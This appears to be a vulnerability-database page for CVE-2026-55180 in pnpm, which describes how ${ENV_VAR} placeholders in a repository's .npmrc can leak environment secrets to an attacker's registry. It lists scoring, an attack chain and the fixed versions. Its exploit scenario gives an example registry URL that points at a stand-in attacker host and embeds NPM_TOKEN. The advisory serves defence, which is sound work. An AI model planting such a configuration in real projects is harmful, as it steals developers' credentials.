Skip to main content

pnpm EUVDEUVD-2026-39498

| CVE-2026-55180 MEDIUM
Information Exposure (CWE-200)
2026-06-25 GitHub_M GHSA-3qhv-2rgh-x77r
6.5
CVSS 3.1 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
6.5 MEDIUM
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
vuln.today AI
6.5 MEDIUM

AV:N as the malicious repo is network-delivered; PR:N since attacker owns the repo not the victim system; UI:R for required clone-and-run; C:H for high-value secret exfiltration; no integrity or availability impact.

3.1 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

2
Patch available
Jun 25, 2026 - 19:17 EUVD
Analysis Generated
Jun 25, 2026 - 18:25 vuln.today

DescriptionCVE.org

pnpm is a package manager. Prior to 10.34.2 and 11.5.3, pnpm and pacquet expanded ${ENV_VAR} placeholders from repository-controlled .npmrc and pnpm-workspace.yaml into registry request destinations and registry credentials. A malicious repository could cause dependency resolution to send victim environment secrets to an attacker-selected registry before lifecycle scripts run. This vulnerability is fixed in 10.34.2 and 11.5.3.

AnalysisAI

{ENV_VAR} placeholders from repository-controlled .npmrc and pnpm-workspace.yaml files into registry request URLs and credentials. When a developer clones and runs pnpm install in a crafted repository, the package manager resolves dependency requests against attacker-controlled registry endpoints, transmitting whatever environment variables (tokens, API keys, credentials) the victim has set in their shell. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Attacker crafts malicious .npmrc with ${ENV_VAR} in registry URL
Delivery
Victim clones attacker-controlled repository
Exploit
Victim runs pnpm install in repository directory
Execution
pnpm expands environment variables into registry destination
Persist
Outbound HTTP request carries secret to attacker server
Impact
Attacker captures credential from server logs

Vulnerability AssessmentAI

Exploitation The victim must clone a repository controlled or influenced by the attacker and then invoke pnpm dependency resolution (e.g., pnpm install, pnpm fetch, or equivalent) within that repository directory. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 score of 6.5 with vector AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N accurately reflects the threat profile: network-delivered, low complexity, no attacker privileges needed, but requiring user interaction (UI:R). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker publishes or contributes to a repository containing a crafted .npmrc or pnpm-workspace.yaml that sets the registry URL to https://attacker.example.com/${NPM_TOKEN}/ or similar. When a victim developer clones the repository and runs pnpm install - a routine step in onboarding, CI pipelines, or reviewing pull requests - pnpm expands the environment variable, transmits the token value to the attacker's server in the outbound HTTP request path, and the attacker captures it from their server logs. …
Remediation Upgrade pnpm to version 10.34.2 or later on the 10.x release line, or to 11.5.3 or later on the 11.x release line - these are the vendor-confirmed fixed versions per the GitHub Security Advisory GHSA-3qhv-2rgh-x77r at https://github.com/pnpm/pnpm/security/advisories/GHSA-3qhv-2rgh-x77r. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Pnpm

View all
CVE-2025-69264 CRITICAL POC
9.8 Jan 07

Arbitrary code execution in the pnpm package manager (versions 10.0.0 through 10.25) lets a git-hosted dependency run co

CVE-2026-50016 HIGH POC
8.8 Jun 25

Path traversal in pnpm before 10.34.0 and 11.4.0 lets a malicious registry package smuggle '../' segments inside a trans

CVE-2026-55698 HIGH POC
8.8 Jun 25

Arbitrary code execution in the pnpm package manager (versions prior to 10.34.2 and 11.5.3) lets a malicious repository

CVE-2026-55697 HIGH POC
8.8 Jun 25

Arbitrary command execution in pnpm before 10.34.2 and 11.5.3 allows a malicious repository to run attacker-chosen nativ

CVE-2025-69263 HIGH POC
8.8 Jan 07

Supply-chain integrity bypass in pnpm package manager (versions ≤10.26.2, per description; GHSA states <10.26.0) allows

CVE-2026-50021 HIGH POC
8.1 Jun 25

Integrity-check bypass in the pnpm package manager (versions before 10.34.0/10.34.1 and 11.0.0-11.3.x) lets tampered pac

CVE-2025-69262 HIGH POC
7.8 Jan 07

{VAR} substitution inside .npmrc tokenHelper settings combined with spawnSync invoked with shell: true. The bug primaril

CVE-2026-50015 HIGH POC
7.3 Jun 25

Arbitrary file write and deletion in pnpm package manager (versions prior to 10.34.0 and 11.4.0) lets a malicious contri

CVE-2026-50014 HIGH POC
7.3 Jun 25

Arbitrary command execution in pnpm before 10.34.0 and 11.4.0 allows a malicious lockfile to run code on a developer's m

CVE-2026-55700 HIGH POC
7.1 Jun 25

Path traversal in pnpm's `pnpm stage download` command (versions 11.3.0 through 11.5.2) lets a malicious or compromised

CVE-2026-55699 MEDIUM POC
6.5 Jun 25

Path traversal in pnpm's global package management flows allows deletion of the global bin directory or its parent when

CVE-2024-47829 MEDIUM POC
6.5 Apr 23

pnpm is a package manager. Rated medium severity (CVSS 6.5), this vulnerability is remotely exploitable, no authenticati

Share

EUVD-2026-39498 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy